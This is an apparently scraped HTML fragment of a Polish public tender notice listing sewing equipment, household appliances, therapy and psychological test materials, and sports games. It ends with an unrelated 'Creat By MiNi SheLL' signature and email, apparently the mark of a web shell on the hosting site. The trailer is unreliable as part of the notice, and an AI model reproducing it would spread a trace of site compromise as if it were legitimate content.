                <b>Nazwa: </b>Zakup i dostawa sprzętu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Maszyna do szycia przystosowana do pracy na każdej powierzchni: 
- min. 20 programy szycia
- Wolne ramię
- Wysięg
- Funkcja szycia wstecz
- min. czterostopniowe obszywanie dziurki na guziki
- Wbudowane oświetlenie
- 24 miesięczna gwarancja
- Instrukcja w języku polskim
- Stebnowanie ściegiem prostym
- Wykańczanie brzegów - ściegiem krytym, ściegami owerlokowymi,
- Niewidoczne podszywanie brzegów - ściegiem krytym
- Wszywanie zamków błyskawicznych
- Wszywanie gumy, reperacje, wzmocnienia tkaniny, szycie bielizny - ściegiem elastycznym
- Szycie materiałów elastycznych - ściegiem prostym potrójnym
- Obrębianie i zszywanie tkaniny - ściegiem owerlokowym, ściegiem zygzak
- Ścieg gałązkowy - idealny łączenia materiałów
- Ścieg satynowy (zagęszczony zyg zag) - szycie dekoracyjne
- Wysięg ułatwia szycie mankietów, nogawek
- Możliwość pikowania, haftowania, przyszywania aplikacji itp.
- Płyta osłaniająca ząbki transportera
- Funkcja przyszywania guzików
- Regulacja długości ściegu
- Nawijanie nici na dolną szpuleczkę
- Chwytacz wahadłowy
 - Stopka ogólnego zastosowania- uniwersalna
- Stopka do suwaków
- Stopka do obrzucania dziurek
- Stopka do przyszywania guzików
- Płytka wyłączająca transporter
- Prujka
- Igły do maszyny: 4 zestawy po 5 sztuk- zestaw tzw. startowy:
 1).Standardowe igły do tkanin: o grubości: 2x70,  2x80, 1x90
2). igły z kulką do dzianin  o grubości: 2x70, 2x80, 1x90
3). igły do stretchu i tkanin elastycznych o grubość 5x75
4). igły do jeansu  o grubości: 2x90, 2x100, 1x110
- 3 zapasowe szpulki
- Śrubokręt
- Regulator obrotów
- Pokrowiec
	2
2	Akcesoria do maszyny do szycia:
- zestaw igieł: - do tkanin o różnej grubości, 
- z kulką do dzianin (25 sztuk), jerseyu (25 sztuk) i materiałów elastycznych (25 sztuk),
 - do dzianin(25 sztuk), tkanin syntetycznych (25 sztuk), poliestrów (25 sztuk), denimu (25 sztuk), 
- do jedwabiu (25 sztuk), mikrofazy (25 sztuk),
- do jeansu (25 sztuk),
 - do pikowania i patchworków (25 sztuk).
-----------------------------------------------------------------------------------------------------------
- metr krawiecki  w pudełeczku, szerokość min 2 cm, długość min 150 cm, 
-----------------------------------------------------------------------------------------------
- mydełko krawieckie  do nanoszenia oznaczeń, różnokolorowe
-----------------------------------------------------------------------------------------------
- papier do wykrojów  rozmiar min 100 x min 70 cm, pergamin sztuczny, bielony, gramatura min 50g/m2, 
-----------------------------------------------------------------------------------------------
- nici do szycia na maszynie  nici szwalnicze, skład 100% poliester, nawój na szpulce min 4000 metrów), różnokolorowe min. 37 kolorów 
-----------------------------------------------------------------------------------------------
Nici kolorowe: białe
                         czarne
                         czerwone
                         niebieskie
                         zielone
-----------------------------------------------------------------------------------------------
- szpilki z perłową główką  długość min 36 mm , mix-kolorów, w przeźroczystym pudełku, po min 40 w opakowaniu
-----------------------------------------------------------------------------------------------
- nożyczki krawieckie  długość nożyc z rękojeścią min 24 cm, wykonanie stal nierdzewna, rękojeść ergonomiczna, odporna na uderzenia, ostrze sześciokątne, 
-----------------------------------------------------------------------------------------------
- agrafki  zestaw:
Min 10 szt różnej wielkości 43mm-18mm (+-2mm)	    


250 szt igieł





----------------
5 szt
----------------
5 szt
----------------
50 arkuszy

---------------
1 zestaw

---------------
5 szt
5 szt
5 szt
5 szt
5 szt
----------------
5 op

----------------
5 szt


------------------
5 zestawów
		
3	Żelazko:
- moc min 2400
- rodzaj stopy: ceramiczna
- pojemność zbiornika na wodę: min. 300ml
- ciągłe wytwarzanie pary: min 40 g/min.
- uderzenie pary: min 140 g/min.
- długość przewodu: min 2m
- kulkowe mocowanie przewodu
- spryskiwacz
- blokada kapania
- prasowanie w pionie
- samooczyszczenie
- 24 miesięczna gwarancja	1
4	Telewizor z akcesoriami (dostawa wraz z montażem)
Telewizor winien posiadać:
Typ telewizora: LED
Z funkcją łączenia telewizji z dostępem do internetu.
Zgodność z wymogami odbioru cyfrowej telewizji naziemnej
Obraz: przekątna ekranu min. 49 cal, , format ekranu 16/9, rozdzielczość min. 1920 x 1080, częstotliwość odświeżania min.  100 Hz, 
Dźwięk: system dźwięku 2.0, moc głośności min. 20 W, dekodery dźwięku DTS, 
Tuner: tuner cyfrowy DVB-C, DVB-S2, DVB-T2
Funkcje: odtwarzanie plików multimedialnych (USB), nagrywanie na USB, 
Komunikacja: HDMI, ilość złącz HDMI  min. 3, USB, ilość złącz USB  2, standard USB  2.0, WiFi, wyjście słuchawkowe, wyjście cyfrowe audio  optyczne, RJ-45
Zużycie energii  klasa A++, pobór mocy max 45 W, pobór mocy w trybie czuwania max 0,5 W, rodzaj zasilania  sieciowe
Możliwość montażu ściennego, podstawa, kolor  czarny
- 24 miesięczna gwarancja

Załączone wyposażenie: baterie do pilota, pilot, podstawa, uchwyt pozwalający zamontować telewizor na ścianie	1
5
	Czajnik elektryczny:
Filtr zatrzymujący osady, materiał: stal nierdzewna, tworzywo sztuczne, 
Zasilanie sieciowe, certyfikat CE, instrukcja w języku polskim, 
Rodzaj uchwytu  zamknięta rączka
Rodzaj grzałki  zakryta
Moc min 2000 W
Pojemność min 1,7 l
Minimalna pojemność niezbędna do pracy czajnika 0,5 l 
Wskaźnik poziomu wody: dwustronny
Typ pokrywy: zatrzaskiwana 
Zabezpieczenie przed włączeniem pustego czajnika
Schowek na przewód
Obrotowa podstawa	4
6	Pojemnik na ręczniki z akcesoriami:
Wykonanie: ABS
Kolor: biało-szary
Pojemnik: na ręczniki papierowe typu  Z o wymiarach 25cmx23 cm, pojemność do 500 szt. ręczników papierowych, okienko do kontroli ilości ręczników w pojemniku, zamykany na plastikowy kluczyk

Akcesoria uzupełniające:
3 Kartony ręczników papierowych Z;  po 4000 szt. ręczników w kartonie, kolor zielony, papier makulaturowy, rozmiar: szer. 25 cm, dł. 23 cm.	1









<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>42715000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zakup i dostawa sukcesywna materiałów specjalistycznych i edukacyjnych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Materiały specjalistyczne do pracy socjoterapeuty:

	Karty dialogowe do gier rozwijających wyobraźnię i kreatywność -Małe, kolorowe obrazki z postaciami ludzi, portretami, krajobrazami, zwierzętami, roślinami, budowlami, przedmiotami codziennego użytku, zjawiskami atmosferycznymi, pojęciami służące do porozumiewania i wywoływania skojarzeń.

	Karty metaforyczne ECCO: talia 99 abstrakcyjnych kart  
Przykładowy wzór









	Karty metaforyczne Habitat lub równoważne: 88 kart obrazkowych o naturze i ludziach 

 
Przykładowy wzór

	Opracowanie scenariuszy zajęć i zabaw dla wychowawców, pedagogów, animatorów kultury i rodziców

	Kukiełki  poznajemy emocje:
Zawartość: 4 pacynki dwustronne emocje; 2 pacynki dodatkowe; płyta CD audio MP3 w języku polskim; instrukcja; karty do ćwiczeń i kolorowania

 

Przykładowy wzór

	Makatka  Pani Twarz
Makatka wykonana z tkaniny, elementy manipulacyjne zapinane na rzepy; wym. 50 x 70 cm; 22 ruchome elementy
 
Przykładowy wzór

	Makatka  Pan Twarz
Makatka wykonana z tkaniny, elementy manipulacyjne zapinane na rzepy; wym. 50 x 70 cm; 22 ruchome elementy
 
Przykładowy wzór

	Materiał obrazkowy  piktogramy emocji
77 kart z piktogramami  1 karta kolorowa (obrazuje radość); wym. Kart 9x9 cm; instrukcja

 
Przykładowy wzór	

1








1


















1












2




1

















2










2













2











2	Materiały specjalistyczne do pracy logopedy:

	Materiał wyrazowo-obrazkowy do utrwalania poprawnej wymowy głosek - komplet 10 zeszytów

	Multimedialny Pakiet Logopedyczny - sz, ż, cz, dż pakiet  program komputerowy, książka , zeszyt ćwiczeń


	Multimedialny Pakiet Logopedyczny - s, z, c, dz - program komputerowy, książka , zeszyt ćwiczeń

	Multimedialny Pakiet Logopedyczny- Ś, Ź, Ć, DŹ - program komputerowy, książka , zeszyt ćwiczeń

	Gra logopedyczna - ma na celu rozwój mowy dziecka w wieku przedszkolnym i wczesnoszkolnym w zakresie poprawnego wyróżniania głosek opozycyjnych, poszerzenia słownika czynnego oraz rozwoju percepcji słuchowej. Podczas gry uczestnicy ćwiczą różnicowanie głosek, a dodatkowo spostrzeganie, pamięć wzrokową, słuchową i koncentrację uwagi., w komplecie: plansza(4puzzle), pionki, 240 kartek z wyrazami, kostka, instrukcja.

	książeczka zawierająca  krótkie teksty rymowane do automatyzacji głosek szeregu szumiących. Materiał językowy (wierszyki, wyliczanki i powiedzonka wyrazowo-obrazkowe) do utrwalania wymowy głosek szumiących. Zawiera około dziewięćdziesięciu wierszyków, częściowo zilustrowanych.
	Test do badań przesiewowych mowy dla dzieci w wieku przedszkolnym. Celem testu jest: wstępna ocena mowy, wychwycenie problemów z mówieniem, sprawdzenie poprawności rozwoju mowy, sprawdzenie rozumienia mowy, ocena sprawności narządów mowy. Publikacja zawiera: przewodnik dla diagnosty, kwestionariusz zdjęciowy dla dziecka
	Gra dydaktyczna polegająca na właściwym ułożeniu kart tak, aby powstała logiczna historyjka. Gra uczy rozumienia następstw czasowych i logicznego myślenia, doskonali umiejętności  wypowiadania się i układania opowiadań, rozwija wyobraźnię i analizę wzrokową. Zawartość pudełka: 20 dwustronnych obrazków, instrukcja.
	Gra ułatwiająca automatyzowanie głosek szeregu syczącego s-z-c-dz. Przeznaczona jest dla dzieci w wieku przedszkolnym i wczesnoszkolnym. W czasie gry dzieci uczą się wymowy poprzez zabawę, ćwicząc dodatkowo pamięć wzrokową i słuchową, spostrzeganie, koncentrację uwagi i myślenie. Prezentowaną grę można zmodyfikować odpowiednio do wieku dziecka, jego umiejętności czy liczby graczy.
Zawartość pudełka: plansza, 30 elementów z głoska s, 30 z głoską c, 24 z głoską z, 12 z głoską dz, kolorowa kostka, lista wykorzystanych wyrazów, instrukcja.
	


	Lustro logopedyczne  szer min 60 cm x wys min 113 cm 


	Przyrząd do wytwarzania baniek mydlanych
pojemność: min. 50ml

 
Przykładowy wzór

	Płyn do baniek mydlanych - pojemność:5l

	Drewniane szpatułki logopedyczne: Opakowanie 100 szt., jednorazowego użytku, wymiar  150 mm x 18 mm

	Czytam i piszę  interaktywna nauka języka polskiego  gra edukacyjna PC 6  10 lat

	Dźwiękowe sześciany  16 dźwiękowych kostek 5 x 5 cm

	Książka do logopedycznych zabaw grupowych dla dzieci od 4 do 7 lat  - zbiór zabaw logopedycznych. Ich celem jest rozbudzenie ciekawości aktywnością słowną oraz zwiększenie możliwości poprawnego i twórczego opanowania języka przez dzieci w wieku przedszkolnym i wczesnoszkolnym.

	Książeczka zawierająca krótkie teksty rymowane do automatyzacji głosek szeregu syczących. Zawiera około dziewięćdziesięciu wierszyków, częściowo zilustrowanych.

	Książka  pomoc logopedyczna - zawierająca ćwiczenia, których zadaniem jest rozruszanie języka i warg, ćwiczenia z różnym stopniem trudności ,krótkie opowiadanie zawierające ćwiczenia, dzięki którym dziecko może utrwalić propozycje usprawnienia warg i języka


	Materiał dźwiękowo-obrazkowy składający się z pojedynczych dźwięków, historyjek dźwiękowych i obrazków do układania wprowadzający dzieci w jeden ze wspaniałych światów - świat dźwięku. 
Ćwiczenia przeznaczone dla: 
- dzieci przedszkolnych i młodszych 
- dzieci z zaburzeniami mowy 
- dzieci niepełnosprawnych w różnym wieku. 
Zabawy mają na celu 
uczyć: 
- uważnego słuchania 
- koncentrowania uwagi na sygnałach dźwiękowych 
- identyfikowania i różnicowania bodźców akustycznych i wzrokowych. 
rozwijać: 
- pamięć słuchową 
- wrażliwość słuchową i wzrokową 
- wyobraźnię 
wzbogacać mowę bierną i czynną. 
Pomoc składa się z płyty CD z nagraniami: 
- odgłosów zwierząt domowych 
- odgłosów na spacerze 
- odgłosów w domu 
- odgłosów zwierząt z ZOO 
- odgłosów mieszanych 
- scenek domowych 
- "co to za miejsce?" 
- historyjek 
i 37 obrazków uzupełniających ćwiczenia i zabawy. 

	Dmuchajka  specyfikacja zestawu:
drewno ( średnica 6 cm, wysokość  5 cm),
- 2 piłeczki styropianowe( średnica 25 mm),
- 1 słomka.
 
Przykładowy wzór

	Historyjki logopedyczne z ćwiczeniami artykulacyjnymi zbiór ok. dziesięciu krótkich opowiadań o różnorodnej tematyce, zgodnej z zainteresowaniami najmłodszych. Z opowiadaniami powiązane są ćwiczenia artykulacyjne. Do każdej historyjki dołączono barwny obrazek oraz kolorowankę. Na końcu opracowania winna być zamieszczona lista historyjek podzielonych ze względu na przydatność do pracy z konkretną wadą wymowy oraz indeks wszystkich ćwiczeń i ich opisy.

	Materiał wyrazowo-obrazkowy do utrwalania poprawnej wymowy głosek - komplet 10 zeszytów, 

	Opracowanie  - gra: składające  się z poradnika, materiałów obrazkowych, zawierających gry językowe i kombinacje ćwiczeń językowych, oraz etykietek z podpisami do poszczególnych obrazków (całość zapakowana w pudełku).
Materiał ten może być wykorzystywany jako pomoc diagnostyczna, a także jako podstawa do tworzenia indywidualnych programów terapii dla dzieci z trudnościami w porozumiewaniu się o różnej etiologii.

	

1



1



1


1



1







1






1





1









1









1



10
















1


4


1


1


1





1



1







1
































10




















1







1



1
3
	Materiały specjalistyczne do pracy psychologa:

	Inwentarz osobowości - NEO-FFI w zestawie:
	Podręcznik
	Arkusze testowe (25 egz.)
	Klucze (kpl. 5 szt.)

	Kwestionariusz Kompetencji Społecznych  KKS w zestawie:
	Podręcznik
	Arkusz M (25 egz.)
	Arkusz D (25 egz.)
	 Klucz

	Popularny Kwestionariusz Inteligencji Emocjonalnej PKIE w zestawie:
Podręcznik
Arkusz (25 egz.)
Klucz

	Skala Kompetencji Osobistej (KompOs) w zestawie:
Podręcznik
Arkusz (25 egz.)

	Zestaw Testów Uzdolnień (ZTU) w zestawie:
Podręcznik, polska adaptacja, 
50 arkuszy do wersji A, 
50 arkuszy do wersji B,
klucz A, 
klucz B

	Test Osobowości i Zainteresowań (TO-Z) w zestawie:
Podręcznik, wyniki polskiej standaryzacji, kwestionariusz, 
50 arkuszy odpowiedzi, 
komplet kluczy

	Test D2 w zestawie:
Podręcznik, wyniki polskiej standaryzacji, 
100 arkuszy, 
2 szablony

	Trening mózgu. 50 zadań wzmacniających lewą i prawą półkulę 

	Trening kreatywność. Podręcznik dla pedagogów, psychologów i trenerów grupowych. Wyd. II poprawione

	Skala Oceny Rodziny  SOR w zestawie:
Podręcznik, 
Kwestionariusz FACES IV i Model kołowy. 
Badania walidacyjne, 
25 arkuszy pytań, 
25 arkuszy odpowiedzi, 
25 profili wyników

	Zestaw Testów Uzdolnień ZTU w zestawie:
Podręcznik, polska adaptacja, 
50 arkuszy do wersji A, 
50 arkuszy do wersji B, 
klucz A, 
klucz B






	


1




1






1




1





1






1



1





1



1



1








1
4	Materiały edukacyjne:

	Zestaw do badmintona: w zestawie 2 rakiety i dwie lotki, rakieta wykonana ze stali, poliamid.  uchwyt : Poliuretan, Drewno, rozmiar  dla dorosłych, sprzęt przeznaczony do gry rekreacyjnej

	Rakietki do tenisa stołowego do gry rekreacyjnej, okładzina 1,4 mm (=- 1mm), kolor okładziny czerwony, czarny

	Piłeczki do tenisa stołowego, średnica 40mm, kolor: biały lub pomarańczowy

	Gra planszowa EUROBUSINESS lub równoważna



	Gra planszowa  warcaby, pionki drewniane lub plastikowe, plansza z grubej tektury, rozmiar opakowania min 28cm x 19 cm, z instrukcją

	Gra szachy, plansza z drewna o wymiarach 26 cm x 26 cm (+- 1), która jest jednocześnie pudełkiem kasetą na przechowywanie pionków, pionki drewniane, od spodu wyścielone miękkim materiałem zapobiegającym ryzowanie planszy z instrukcją.

	Dart (tablica + piłeczki), tarcza i piłeczki na rzepy. Zestaw zawiera: Tarcza na rzepy o średnicy 38 cm (+-1), Min 4 piłeczki o średnicy 4 cm , które przyczepiają się do tarczy, Tarcza mam mieć uchwyt do zawieszenia

	Dart (tablica + rzutki magnetyczne), rzutki zakończone mocnymi magnesami umożliwiającymi przyczepność rzutki do tablicy. Tarcza wykonana z materiału magnetycznego dzięki , któremu lotki się trzymają. Zestaw zawiera:  tarcza dwustronna o wymiarach 39 cm x 32 cm (+-1 cm).,
min 6 rzutek zakończonych magnesem
pudełko. Tarcza mam mieć uchwyt do zamieszenia

	Taśma miernicza  min 15 m, max 20 m, zwijana, obudowa plastikowa,

	Mini bramki do piłki nożnej, samorozkładające się, wymiary po rozłożeniu 120cm x 80 cm (+-5 cm), materiał z którego wykonano bramki: poliester, stelaż z włókna szklanego lub innego odpowiedniego surowca, z tzw. śledziami umożliwiającymi przymocowanie w podłożu.


	Mini golf  zestaw, zestaw zawiera:
Min 2 kije  o długości ok 85 cm (+- 4 cm), z chromowanej stali, rękojeść z gumy albo drewniane
Min. 4 przeszkody z tworzywa sztucznego
Min 2 piłeczki z tworzywa sztucznego, białe
Torba do przechowywania

	Kosz stojący + piłka  zestaw:
Obręcz i kosz zamontowane na metalowym słupie, pomalowanym proszkowo, 
wysokość obręczy regulowana w zakresie 200  260 cm (=- 6 cm)
tablica z trwałego tworzywa  o wymiarach ok 90cmx60cm
obręcz malowana proszkowo o przekroju ok 16 mm (+- 1mm)
średnica obręczy ok 45 cm (+-1)
długość siatki ok 53 cm (+- 2)
stopka z kółkami o pojemości dopasowanej do całej wagi sprzętu do napełniania wodę lub piaskiem

piłka do koszykówki  - rozmiar 7
	


5


10



80

      2




2




2



1






1





1




4






2





1
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>22100000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com